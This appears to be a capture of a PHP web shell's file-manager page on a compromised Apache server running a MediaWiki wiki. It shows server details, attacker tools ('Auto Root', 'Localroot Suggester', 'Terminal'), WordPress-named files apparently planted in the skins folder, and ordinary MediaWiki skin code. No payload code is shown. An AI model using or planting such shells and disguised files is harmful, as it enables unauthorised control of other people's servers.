Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
wiki.bernardino.org /
skins /
Delete
Unzip
Name
Size
Permission
Date
Action
1
[ DIR ]
drwxr-xr-x
2012-04-25 19:52
CologneBlue
[ DIR ]
drwxr-xr-x
2016-11-28 20:21
Modern
[ DIR ]
drwxr-xr-x
2016-11-28 20:21
MonoBook
[ DIR ]
drwxr-xr-x
2016-11-28 20:21
Vector
[ DIR ]
drwxr-xr-x
2016-11-28 20:21
chick
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
cologneblue
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
common
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
modern
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
monobook
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
myskin
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
nostalgia
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
simple
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
vector
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
.htaccess
197
B
-r--r--r--
2026-08-22 08:29
Chick.deps.php
503
B
-rw-r--r--
2008-03-11 17:29
Chick.php
934
B
-rw-r--r--
2011-08-06 14:07
CologneBlue.php
10.27
KB
-rw-r--r--
2011-11-24 17:27
Modern.deps.php
452
B
-rw-r--r--
2008-03-11 17:29
Modern.php
4.08
KB
-rw-r--r--
2011-09-08 00:07
MonoBook.deps.php
453
B
-rw-r--r--
2008-03-11 17:29
MonoBook.php
9.23
KB
-rw-r--r--
2011-10-26 20:47
MySkin.deps.php
504
B
-rw-r--r--
2008-03-11 17:29
MySkin.php
434
B
-rw-r--r--
2009-09-22 18:52
Nostalgia.php
3.04
KB
-rw-r--r--
2011-08-06 14:07
README
1.18
KB
-rw-r--r--
2016-11-28 20:20
Simple.deps.php
504
B
-rw-r--r--
2008-03-11 17:29
Simple.php
1.22
KB
-rw-r--r--
2011-09-21 00:36
Standard.php
8.15
KB
-rw-r--r--
2011-10-20 23:22
Vector.deps.php
452
B
-rw-r--r--
2009-05-30 22:02
Vector.php
14.94
KB
-rw-r--r--
2011-10-26 20:47
wp-blog-header.php
2.74
KB
-r--r--r--
2026-08-22 08:29
wp-cron.php
2.74
KB
-rw-r--r--
2026-08-22 08:29
Save
Rename
<?php /** * Modern skin, derived from monobook template. * * @todo document * @file * @ingroup Skins */ if( !defined( 'MEDIAWIKI' ) ) die( -1 ); require( dirname(__FILE__) . '/MonoBook.php' ); /** * Inherit main code from SkinTemplate, set the CSS and template filter. * @todo document * @ingroup Skins */ class SkinModern extends SkinTemplate { var $skinname = 'modern', $stylename = 'modern', $template = 'ModernTemplate', $useHeadElement = true; function setupSkinUserCss( OutputPage $out ){ parent::setupSkinUserCss( $out ); $out->addModuleStyles ('skins.modern'); } } /** * @todo document * @ingroup Skins */ class ModernTemplate extends MonoBookTemplate { /** * @var Skin */ var $skin; /** * Template filter callback for Modern skin. * Takes an associative array of data set from a SkinTemplate-based * class, and a wrapper for MediaWiki's localization database, and * outputs a formatted page. * * @access private */ function execute() { $this->skin = $skin = $this->data['skin']; // Suppress warnings to prevent notices about missing indexes in $this->data wfSuppressWarnings(); $this->html( 'headelement' ); ?> <!-- heading --> <div id="mw_header"><h1 id="firstHeading"><?php $this->html('title') ?></h1></div> <div id="mw_main"> <div id="mw_contentwrapper"> <!-- navigation portlet --> <?php $this->cactions(); ?> <!-- content --> <div id="mw_content"> <!-- contentholder does nothing by default, but it allows users to style the text inside the content area without affecting the meaning of 'em' in #mw_content, which is used for the margins --> <div id="mw_contentholder"> <div class='mw-topboxes'> <div id="mw-js-message" style="display:none;"<?php $this->html('userlangattributes')?>></div> <div class="mw-topbox" id="siteSub"><?php $this->msg('tagline') ?></div> <?php if($this->data['newtalk'] ) { ?><div class="usermessage mw-topbox"><?php $this->html('newtalk') ?></div> <?php } ?> <?php if($this->data['sitenotice']) { ?><div class="mw-topbox" id="siteNotice"><?php $this->html('sitenotice') ?></div> <?php } ?> </div> <div id="contentSub"<?php $this->html('userlangattributes') ?>><?php $this->html('subtitle') ?></div> <?php if($this->data['undelete']) { ?><div id="contentSub2"><?php $this->html('undelete') ?></div><?php } ?> <?php if($this->data['showjumplinks']) { ?><div id="jump-to-nav"><?php $this->msg('jumpto') ?> <a href="#mw_portlets"><?php $this->msg('jumptonavigation') ?></a>, <a href="#searchInput"><?php $this->msg('jumptosearch') ?></a></div><?php } ?> <?php $this->html('bodytext') ?> <div class='mw_clear'></div> <?php if($this->data['catlinks']) { $this->html('catlinks'); } ?> <?php $this->html ('dataAfterContent') ?> </div><!-- mw_contentholder --> </div><!-- mw_content --> </div><!-- mw_contentwrapper --> <div id="mw_portlets"<?php $this->html("userlangattributes") ?>> <!-- portlets --> <?php $this->renderPortals( $this->data['sidebar'] ); ?> </div><!-- mw_portlets --> </div><!-- main --> <div class="mw_clear"></div> <!-- personal portlet --> <div class="portlet" id="p-personal"> <h5><?php $this->msg('personaltools') ?></h5> <div class="pBody"> <ul> <?php foreach($this->getPersonalTools() as $key => $item) { ?> <?php echo $this->makeListItem($key, $item); ?> <?php } ?> </ul> </div> </div> <!-- footer --> <div id="footer"<?php $this->html('userlangattributes') ?>> <ul id="f-list"> <?php foreach( $this->getFooterLinks("flat") as $aLink ) { if( isset( $this->data[$aLink] ) && $this->data[$aLink] ) { ?> <li id="<?php echo$aLink?>"><?php $this->html($aLink) ?></li> <?php } } ?> </ul> <?php foreach ( $this->getFooterIcons("nocopyright") as $blockName => $footerIcons ) { ?> <div id="mw_<?php echo htmlspecialchars($blockName); ?>"> <?php foreach ( $footerIcons as $icon ) { ?> <?php echo $this->skin->makeFooterIcon( $icon, 'withoutImage' ); ?> <?php } ?> </div> <?php } ?> </div> <?php $this->printTrail(); ?> </body></html> <?php wfRestoreWarnings(); } // end of execute() method } // end of class